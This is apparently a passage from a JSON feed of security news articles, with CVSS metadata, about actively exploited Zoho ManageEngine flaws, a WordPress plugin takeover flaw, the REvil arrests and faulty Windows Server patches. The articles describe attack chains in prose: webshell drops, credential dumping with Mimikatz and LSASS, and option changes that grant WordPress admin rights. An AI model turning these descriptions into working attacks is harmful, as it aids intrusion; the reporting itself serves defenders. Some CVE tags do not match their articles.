"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-03T05:50:32", "id": "THN:E7E8D45492BAD83E88C89D34F8502485", "href": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T06:36:28", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.\n\nThe flaw, tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.\n\nManageEngine ADSelfService Plus is an integrated self-service password management and a single sign-on solution for Active Directory and cloud apps, enabling admins to enforce two-factor authentication for application logins and users to reset their passwords.\n\n\"CVE-2021-40539 has been detected in exploits in the wild. 
A remote attacker could exploit this vulnerability to take control of an affected system,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>), urging companies to apply the latest security update to their ManageEngine servers and \"ensure ADSelfService Plus is not directly accessible from the internet.\"\n\n\"The exploitation of ManageEngine ADSelfService Plus poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>). \"Successful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\"\n\nIn an independent advisory, Zoho [cautioned](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) that it's a \"critical issue\" and that it's \"noticing indications of this vulnerability being exploited.\"\n\n\"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\" the company said. \"This would allow the attacker to carry out subsequent attacks resulting in RCE.\"\n\nCVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which \u2014 [CVE-2021-37421](<https://nvd.nist.gov/vuln/detail/CVE-2021-37421>) (CVSS score: 9.8), [CVE-2021-37417](<https://nvd.nist.gov/vuln/detail/CVE-2021-37417>) (CVSS score: 9.8), and [CVE-2021-33055](<https://nvd.nist.gov/vuln/detail/CVE-2021-33055>) (CVSS score: 9.8) \u2014 were addressed in recent updates. 
A fourth vulnerability, [CVE-2021-28958](<https://nvd.nist.gov/vuln/detail/CVE-2021-28958>) (CVSS score: 9.8), was rectified in March 2021.\n\nThis development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. In March 2020, APT41 actors were [found](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) leveraging an RCE flaw in ManageEngine Desktop Central ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T05:45:00", "type": "thn", "title": "CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-28958", "CVE-2021-33055", "CVE-2021-37417", "CVE-2021-37421", "CVE-2021-40539"], "modified": "2021-09-17T04:49:55", "id": "THN:1678C3AE3BCB0278860461A943C3DF30", "href": "https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-21T14:43:15", "description": "Another Zoho ManageEngine zero-day vulnerability is under active attack from an APT group, this time looking to override legitimate functions of servers running ManageEngine Desktop Central and elevate privileges \u2014 with an ultimate goal of dropping malware onto organizations\u2019 networks, the FBI has warned.\n\nAPT actors have been exploiting the bug, tracked as [CVE-2021-44515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44515>), since at least late October, the feds revealed in an [FBI Flash alert](<https://www.ic3.gov/Media/News/2021/211220.pdf>) released last week. There is also evidence to support that it\u2019s being used in an attack chain with two other Zoho bugs that researchers have observed under attack since September, according to the alert.\n\nThe latest vulnerability is an authentication-bypass vulnerability in ManageEngine Desktop Central that can allow an attacker to execute arbitrary code in the Desktop Central server, according to a Zoho [advisory](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) that addressed the issue, published earlier this month.\n\nIndeed, the feds said they observed APT actors doing exactly that. 
More specifically, researchers observed attackers \u201ccompromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials,\u201d according to the Flash Alert.\n\nZoho has addressed the vulnerability and is urging organizations to update to the appropriate latest builds of ManageEngine Desktop Central due to \u201cindications of exploitation,\u201d the company said in its advisory.\n\nSpecifically, the company is advising enterprise customers who have builds 10.1.2127.17 and below deployed to upgrade to build [10.1.2127.18](<https://downloads.zohocorp.com/dnd/Desktop_Central/vSfr4V3f7NXjEJK/ManageEngine_Desktop_Central_10_1_0_SP-2127_18.ppm>); and those using builds 10.1.2128.0 to 10.1.2137.2 to upgrade to build [10.1.2137.3](<https://downloads.zohocorp.com/dnd/Desktop_Central/5fbkfifZFuh9mVx/ManageEngine_Desktop_Central_10_1_0_SP-2137_3.ppm>).\n\n## **Zoho Under Fire**\n\nThe bug is the third zero-day under active attack that researchers have discovered in the cloud platform company\u2019s ManageEngine suite since September, spurring dire warnings from the FBI and researchers alike.\n\nThough no one has yet conclusively identified the APT responsible, it\u2019s likely the attacks are linked and those responsible are from China, previous evidence has shown.\n\nEarlier this month, researchers at Palo Alto Networks Unit 42 [revealed](<https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/>) that state-backed adversaries were using vulnerable versions of ManageEngine ServiceDesk Plus to target a number of U.S. organizations between late October and November.\n\nThe attacks were related to a bug revealed in a Nov. 
22 [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) by Zoho alerting customers of active exploitation against newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) found in ManageEngine ServiceDesk Plus. The vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below.\n\nThat news came on the heels of [warnings](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September by the FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) that an unspecified APT was exploiting a then-zero-day vulnerability in Zoho ManageEngine\u2019s password management solution called ADSelfService Plus.\n\nZoho issued [a fix](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) for the vulnerability, tracked as [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>), soon after; still, researchers observed attackers [exploiting it](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) later in November in their continued assault on defense, energy and healthcare organizations.\n\nUnit 42 researchers combined the two previously known active attack fronts against Zoho\u2019s ManageEngine as the [\u201cTiltedTemple\u201d](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>) campaign, and said earlier this month that there is evidence to link the APT responsible to China, although it is not conclusive.\n\nThe latest Flash Alert released by the FBI also shows a correlation between earlier APT attacks on ManageEngine and ADSelfService Plus, with malicious samples of code observed in the latest exploitation \u201cdownloaded from likely compromised ManageEngine ADSelfService Plus 
servers,\u201d according to the alert.\n\n## **Inside the Exploitation**\n\nThose samples show initial exploitation of a Desktop Central API URL that allowed for an unauthenticated file upload of two different variants of webshells; the first variant was delivered using either the file name \u201cemsaler.zip\u201d or \u201ceco-inflect.jar\u201d in late October and mid-November, respectively; and a second variant using the file name \u201caaa.zip\u201d in late November.\n\nThe webshell overrides the legitimate Desktop Central API servlet endpoint, \u201c/fos/statuscheck,\u201d and either filters inbound GET in the case of the second variant, or POST requests in the case of the first variant, to that URL path, according to the FBI. It then allows attackers to execute commands as the SYSTEM user with elevated privileges if the inbound requests pass the filter check.\n\nThe webshell allows attackers to conduct initial reconnaissance and domain enumeration, after which the actors use BITSAdmin to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe, according to the FBI. 
Attackers then sideload the dropper through AppLaunch execution, creating a persistent service to execute the AppLaunch binary moving forward.\n\n\u201cUpon execution, the dropper creates an instance of svchost and injects code with RAT-like functionality that initiates a connection to a command and control server,\u201d according to the FBI.\n\nThreat actors conduct follow-on intrusion activity through the RAT, including attempted lateral movement to domain controllers and credential dumping techniques using Mimikatz, comsvcs.dll LSASS process memory dumping, and a WDigest downgrade attack with subsequent LSASS dumping through pwdump, researchers observed.\n\nThe FBI Flash Alert includes a detailed list of indicators of compromise so organizations using Zoho\u2019s ManageEngine Desktop Central can check to see if they are at risk or have been a victim of attack.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-21T14:42:02", "type": "threatpost", "title": "FBI: Another Zoho ManageEngine Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-21T14:42:02", "id": "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "href": "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T16:17:40", "description": "Researchers have discovered three [WordPress plug-ins](<https://threatpost.com/wordpress-plugin-bug-wipe-sites/175826/>) with the same vulnerability that allows an attacker to update arbitrary site options on a vulnerable site and completely take it over. Exploiting the flaw does require some action from the site administrator, however.\n\nOn Nov. 5, 2021, the Wordfence Threat Intelligence team started a process to disclose a vulnerability researchers had found in \u201c[Login/Signup Popup](<https://wordpress.org/plugins/easy-login-woocommerce>),\u201d a [WordPress plug-in](<https://threatpost.com/frontend-file-manager-wordpress-bugs/167687/>) installed on more than 20,000 sites, Wordfence\u2019s Chloe Chamberland wrote [in a post](<https://www.wordfence.com/blog/2022/01/84000-wordpress-sites-affected-by-three-plugins-with-the-same-vulnerability/?utm_medium=email&_hsmi=200773868&_hsenc=p2ANqtz-8wONqcLAiQD8o__3dsSDSjuLwHX4hhqMgH_Vvhs-LcUGTU2JWYOvVeflfGHs_Uz1VP67vtVIWObFp9507lPzgx4OjFww&utm_content=200773868&utm_source=hs_email>) published online Thursday.\n\nHowever, a few days later they discovered that the flaw was present in two other plug-ins by the same developer, who goes by the online name of [XootiX.](<https://xootix.com/>) They are \u201c[Side Cart Woocommerce (Ajax)](<https://wordpress.org/plugins/side-cart-woocommerce/>),\u201d which has been installed on more than 60,000 sites, and \u201c[Waitlist Woocommerce (Back 
in stock notifier)](<https://wordpress.org/plugins/waitlist-woocommerce/>),\u201d which has been installed on more than 4,000.\n\nLogin/Signup Popup is a \u201csimple and lightweight\u201d plug-in aimed at streamlining a site\u2019s registration, login and password reset processes, according to its description online. Side Cart Woocommerce \u2013 designed to work with the Woocommerce plugin for creating an e-commerce store \u2013 allows a site\u2019s users to access items they\u2019ve placed into a shopping cart from anywhere on the site. Waitlist Woocommerce \u2013 also to be used with Woocommerce \u2013 adds the functionality of tracking demand for out-of-stock items to an e-commerce site.\n\nAs of now, all of the plug-ins have been updated and the flaw patched, according to the post. On Nov. 24, the developer released a patched version of Login/Signup Popup as version 2.3. Later, on Dec. 17, a patched version of Waitlist Woocommerce, version 2.5.2, was released; and a patched version of Side Cart Woocommerce, version 2.1, was released.\n\nStill, the discovery of the bug\u2019s multiple occurrences reflects an ongoing issue with WordPress plug-ins being riddled with flaws. Indeed, vulnerabilities in the plug-ins [skyrocketed](<https://www.riskbasedsecurity.com/2022/1/11/wordpress-vulnerabilities-more-than-doubled-in-2021/>) with triple-digit growth in 2021, according to RiskBased Security.\n\n## **How the Flaw Works**\n\nThe vulnerability found by the Wordfence team is fairly straightforward, Chamberland wrote. 
All three plug-ins register the save_settings function, which is initiated via a wp_ajax action, they said.\n\nIn each of the plug-ins, \u201cthis function was missing a nonce check, which meant that there was no validation on the integrity of who was conducting the request,\u201d according to the post.\n\nWhat this sets up is a scenario in which an attacker can craft a request that would trigger the AJAX action and execute the function, Chamberland wrote. However, action from the site\u2019s administrator \u2013 \u201clike clicking on a link or browsing to a certain website while the administrator was authenticated to the target site\u201d \u2013 is needed to fully exploit the flaw, she said.\n\nIn these cases, \u201cthe request would be successfully sent and trigger the action which would allow the attacker to update arbitrary options on that website,\u201d she explained in the post.\n\nExploiting Arbitrary Options Update vulnerabilities in this way is something threat actors \u201cfrequently abuse,\u201d allowing them to update any option on a WordPress website and to ultimately take it over, Chamberland noted.\n\nThis latter privilege occurs if an attacker sets \u201cthe user_can_register option to true and the default_role option to administrator so that they can register on the vulnerable site as an administrator,\u201d she explained.\n\n## **Risks and Mitigations**\n\nThough the fact that the flaws found in the plug-ins require administrator action makes them \u201cless likely to be exploited,\u201d they can have \u201csignificant impact\u201d if they are exploited, Chamberland said.\n\n\u201cAs such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plug-ins and themes up to date,\u201d she advised.\n\nRecommended actions for WordPress users who use the plug-ins are to verify that their site has been updated to the latest patched version available for each of 
them. That would be version 2.3 for \u201cLogin/Signup Popup\u201d, version 2.5.2 for \u201cWaitlist Woocommerce (Back in stock notifier)\u201d, and version 2.1 for \u201cSide Cart Woocommerce (Ajax),\u201d according to the post.\n\nAll Wordfence users are protected against the vulnerability, according to the post. Wordfence Premium users received a firewall rule to protect against any exploits targeting them on Nov. 5, and sites still using the free version of Wordfence received the same protection on Dec. 5.\n", "cvss3": {}, "published": "2022-01-14T14:07:36", "type": "threatpost", "title": "Three Plugins with Same Bug Put 84K WordPress Sites at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-14T14:07:36", "id": "THREATPOST:31B21CE688CDF18D92BF7799CEAFD33F", "href": "https://threatpost.com/plugins-vulnerability-84k-wordpress-sites/177654/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-18T16:19:04", "description": "At the request of U.S. authorities, 
Russia\u2019s Federal Security Service (FSB) has swooped in to \u201cliquidate\u201d the REvil ransomware gang, it said on Friday.\n\nAccording to [local reports](<https://www.rbc.ru/politics/14/01/2022/61e171599a79479dde32112e?from=from_main_1>), the country\u2019s main security agency raided 25 locations in Leningrad, Lipetsk, Moscow and St. Petersburg, seizing assets worth more than $5.6 million (426 million rubles) in various forms, including $600,000; \u20ac500,000; various cryptocurrency amounts; and 20 luxury vehicles.\n\nThe FSB said that a total of 14 alleged cybercriminals were also caught up in the raid and have been charged with \u201cillegal circulation of means of payment.\u201d The security service also said that it \u201cneutralized\u201d the gang\u2019s infrastructure.\n\nThe impetus for the attack was reportedly a formal request for action from U.S. authorities, \u201creporting about the leader of the criminal community and his involvement in encroachments on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,\u201d according to an FSB media statement.\n\nIt added, \u201cAs a result of the joint actions of the FSB and the Ministry of Internal Affairs of Russia, the organized criminal community ceased to exist, the information infrastructure used for criminal purposes was neutralized. Representatives of the competent U.S. authorities have been informed about the results of the operation.\u201d\n\nThe move comes two weeks after a [high-stakes phone call](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/12/30/statement-by-press-secretary-jen-psaki-on-president-bidens-phone-call-with-president-vladimir-putin-of-russia/>) between Russian President Vladimir Putin and U.S. 
President Joe Biden, who has been calling for action against Russia-dwelling ransomware gangs for months.\n\nREvil (aka Sodinokibi) once rose to dominance as a major fixture in the ransomware extortion racket \u2013 locking up big-fish target networks ([like JBS Foods](<https://threatpost.com/revil-ransomware-ground-down-jbs-sources/166597/>)) and extracting millions in ransom payments. It made headlines last year with the [sprawling zero-day supply-chain attacks](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) on Kaseya\u2019s customers; and [was linked to](<https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/>) the infamous Colonial Pipeline cyberattack. All of that sparked an official shout-out from Biden in the summer, with a demand that Putin shut down ransomware groups nesting in his country.\n\nShortly after that, in July, REvil\u2019s servers [mysteriously went dark](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) and stayed that way for two months. But by late summer, the group [was reborn](<https://threatpost.com/revil-back-coder-decryptor-key/169403/>) as a ransomware-as-a-service (RaaS) player, though by all accounts it was operating at a fraction of its former power and missing key personnel. Its main coder, UNKN (aka Unknown), for instance, reportedly left the group. 
It also got into trouble in the cyber-underground for cutting its RaaS affiliates [out of their fair share](<https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/>) of ransom payments.\n\nChris Morgan, senior cyber-threat intelligence analyst at Digital Shadows, noted that FSB\u2019s actions sparked some chatter on the cyber-underground about REvil falling prey to political machinations.\n\n\u201cIt\u2019s likely that the arrests against REvil members were politically motivated, with Russia looking to use the event as leverage; it could be debated that this may relate to sanctions against Russia recently proposed in the US, or the developing situation on Ukraine\u2019s border,\u201d he said. \u201cChatter on Russian cybercriminal forums identified this sentiment.\u201d\n\nHe said that one user suggested that REvil members are \u201cpawns in a big political game,\u201d while another user suggested that Russia made the arrests \u201con purpose\u201d so that the United States would \u201ccalm down.\u201d\n\n## **REvil Takedown: Will it Matter?**\n\nThe reported takedown may have defanged a brand-name ransomware operator, but REvil is far from what it used to be, and other groups continue to strike with impunity. LockBit 2.0, [for instance](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>), has been flourishing, as evidenced by Herjavec Group\u2019s LockBit 2.0 profile and its long list of LockBit 2.0\u2019s victims.\n\nRansomware opportunities are growing in availability, too; Group-IB [recently found](<https://threatpost.com/double-extortion-ransomware-data-leaks/176723/>) that 21 new RaaS affiliate programs sprang up over the past year, and the number of new double-extortion leak sites more than doubled to 28, the report said.\n\nIn other words, this action may be simply a tiny win in the much larger battle against ransomware. 
But REvil has become an important symbolic target in the fight \u2013 not least for its potential ties to Colonial Pipeline \u2013 and has been increasingly in government crosshairs worldwide.\n\nIn October, a [multi-country undercover effort](<https://threatpost.com/revil-servers-offline-governments/175675/>) led to REvil\u2019s servers being temporarily taken offline. In November, Europol [announced the arrest](<https://threatpost.com/revil-affiliates-arrested-doj-europol/176087/>) of a total of seven suspected REvil/GandCrab ransomware affiliates \u2013 including a Ukrainian national charged by the United States with ransomware assaults that include the Kaseya attacks. Other countries have also snagged affiliates (random cyberattackers who rent REvil\u2019s infrastructure), which doesn\u2019t affect the main gang; but in October, Germany identified an alleged core REvil operator, hiding in Russia and far from the reach of extradition.\n\nRussia, for its part, may gain some kudos for this week\u2019s action, though researchers have long noted that the country has become a safe haven for ransomware masterminds, who avoid attacking Russian targets in exchange.\n\n\u201cIn Russia, they literally have no fear of being arrested,\u201d Jon DiMaggio, threat group researcher and chief security strategist at Analyst1, recently said, discussing the cyber-underground\u2019s collective shrug at the November news that REvil affiliates were being busted. \u201cThey make comments like, \u2018protect the motherland, the motherland protects you\u2019\u2026They put Russian flag icons on their messages.\u201d\n\nCould that be changing? Only time will tell, researchers said.\n\n\u201cRussia acting on any cybercrime report, especially ransomware, is especially rare,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost. \u201cUnless it involves child exploitation or Chechens, cooperation with the FSB just doesn\u2019t happen. 
It is doubtful that this represents a major change in Russia\u2019s stance to criminal activity within their borders (unless they target Russian citizens) and more that their diplomatic position is untenable and they needed to sacrifice a few expendables to stall more serious geopolitical pressure.\u201d\n\nHe added, \u201cIf this time in three months there isn\u2019t another major arrest, it\u2019s safe to assume no real change has happened with Russia\u2019s approach.\u201d\n\n\u201cIt\u2019s possible that the FSB raided REvil knowing that the group were high on the priority list for the U.S., while considering that their removal would have a small impact on the current ransomware landscape,\u201d Digital Shadows\u2019 Morgan added.\n
", "cvss3": {}, "published": "2022-01-14T14:45:35", "type": "threatpost", "title": "Russian Security Takes Down REvil Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-14T14:45:35", "id": "THREATPOST:0461DD3D883C3FB99943B312BF96E57D", "href": "https://threatpost.com/russian-security-revil-ransomware/177660/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-18T16:18:10", "description": "Microsoft has yanked the Windows Server updates it issued on Patch Tuesday after admins found that the updates had critical bugs that break three things: They trigger spontaneous boot loops on Windows servers that act as domain controllers, break Hyper-V and render ReFS volume systems unavailable.\n\nThe shattering of Windows was first reported by [BornCity](<https://borncity.com/win/2022/01/12/windows-server-januar-2022-sicherheitsupdates-verursachen-boot-schleife/>) on Tuesday, as in, on the same day that Microsoft released a mega-dump of 97 security updates in its [January 2022 Patch Tuesday](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>) update.\n\nThis month\u2019s batch included the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update and the Windows Server 2022 KB5009555 update, all of which are apparently buggy.\n\n\u201cAdministrators of Windows Domain Controllers should be careful about installing the January 2022 security updates,\u201d reported [BornCity](<https://borncity.com/win/2022/01/12/windows-server-januar-2022-sicherheitsupdates-verursachen-boot-schleife/>), which is a blog about information technology run by German freelance writer and physics engineer G\u00fcnter Born.\n\n\u201cI have now received numerous reports that Windows servers 
acting as domain controllers will not boot afterwards,\u201d Born wrote. \u201cLsass.exe (or wininit.exe) triggers a blue screen with the stop error 0xc0000005. It can hit all Windows Server versions that act as domain controllers, according to my estimation.\u201d\n\nDomain controllers are servers that handle security authentication requests within a Windows domain. Microsoft\u2019s Hyper-V, the other chunk of Windows being broken by the Windows Server updates, is a native hypervisor that can create virtual machines on x86-64 systems running Windows.\n\nThe third thing that\u2019s shattering due to the updates, Resilient File System (ReFS), is a file system that\u2019s designed to maximize data availability, scale efficiently to large data sets across diverse workloads and provide data integrity with resiliency to corruption, as Microsoft [describes](<https://docs.microsoft.com/en-us/windows-server/storage/refs/refs-overview>) it.\n\nBorn cited numerous reports from users who\u2019ve concluded that the issue affects all supported Windows Server versions.\n\nMultiple Reddit users confirmed the problems. 
[One commenter](<https://www.reddit.com/r/sysadmin/comments/s21ae1/january_updates_causing_unexpected_reboots_on/>) said that it \u201cLooks like KB5009557 (2019) and KB5009555 (2022) are causing something to fail on domain controllers, which then keep rebooting every few minutes.\u201d\n\nAnother Reddit contributor [said](<https://www.reddit.com/r/sysadmin/comments/s1oqv8/kb5009543_january_11_2022_breaks_l2tp_vpn/>) on Tuesday that they had just rebooted Win10 laptops that had the installed KB5009543 & KB5008876 updates and found that they\u2019re also breaking L2TP VPN connections.\n\n\u201cNow their L2TP VPNs to different sites (All SonicWalls) are not working,\u201d the Redditor said, citing an error message that read: \u201cThe L2TP connection attempt failed because the security layer encountered a processing error during initial negotiations with the remote computer.\u201d\n\nOn Thursday, following the server update brouhaha, BleepingComputer [reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-new-windows-server-updates-due-to-critical-bugs/>) that Microsoft has pulled the January Windows Server cumulative updates, which are reportedly no longer accessible via Windows Update. As of Thursday afternoon, however, the company reportedly hadn\u2019t pulled the Windows 10 and Windows 11 cumulative updates that were breaking L2TP VPN connections.\n\n011422 08:48 UPDATE: Microsoft confirmed that it\u2019s aware of the reports and is investigating. 
A spokesperson pointed users to the company\u2019s customer guidance page for any known issues: [Windows release health | Microsoft Docs](<https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Fwindows%2Frelease-health%2F&data=04%7C01%7Cmmaclachlan%40we-worldwide.com%7Ca95e18bba6204baad99208d9d6f38898%7C3ed60ab455674971a5341a5f0f7cc7f5%7C0%7C0%7C637777163738633134%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=cwm6AQvP2A1g8dItDwBH4zoS9ETJWW7WoXE6SA4R6pE%3D&reserved=0>).\n\n## When Patches Bite Back\n\nHow do you convince organizations to patch promptly when patches sometimes don\u2019t work \u2013 or, worse, when they cause outages on critical infrastructure such as directory controllers?\n\nIt\u2019s clearly a problem from a security perspective, experts say. \u201cThe [log4j](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) difficulties of the past few weeks demonstrate that \u2026 we need organizations to apply security patches when they are available,\u201d said John Bambenek, principal threat hunter at Netenrich.\n\nWhen patches don\u2019t work, or worse, when they break things, it \u201cprovides the counter incentive to patching where organizations take a risk-averse approach to applying updates,\u201d he told Threatpost on Thursday. \u201cDowntime is easily measurable\u2026the incremental risk of a security breach is not, which means cautious (instead of proactive) actions to patching will tend to win out.\u201d\n\nIt\u2019s a painful tradeoff to make between keeping your operations going by using systems with known vulnerabilities versus keeping those systems fully secure but with added administrative effort, noted Bud Broomhead, CEO at Viakoo. 
\u201cOrganizations make these tradeoffs every day with IoT devices that fail to get patched quickly (or ever); however, it\u2019s uncommon to see this with Windows Server, because there are such effective mechanisms through Windows Update to deliver and install patches quickly.\u201d\n\nBroomhead suggested that despite the testing Microsoft goes through in releasing an update, one best practice is to always install a new patch on a single machine before deploying more broadly. \u201cThis can help Windows Server administrators to assess their specific issues, and their tolerance for running under those conditions until a more stable patch is available,\u201d he told Threatpost.\n\nThat\u2019s actually closer to the reality, noted Roy Horev, co-founder and CTO at Vulcan Cyber. \u201cFirst, very rarely are patches ever directly applied straight from Microsoft, or any vendor, on Tuesday, or any other day, without first going through a series of tests to make sure they aren\u2019t breaking things,\u201d he pointed out.\n\nEven so, it\u2019s tough to implement vendor patches and updates without breaking things, he told Threatpost via email \u2013 even if those patches are delivered straight from Redmond. \u201cThe eternal compromise between secure and/or stable production environments doesn\u2019t rest just because the updates are coming from Microsoft,\u201d Horev commented.\n
", "cvss3": {}, "published": "2022-01-13T23:08:53", "type": "threatpost", "title": "Microsoft Yanks Buggy Windows Server Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-13T23:08:53", "id": "THREATPOST:2819C02936EF8F6F36ACF4F04F4B71DB", "href": "https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. 
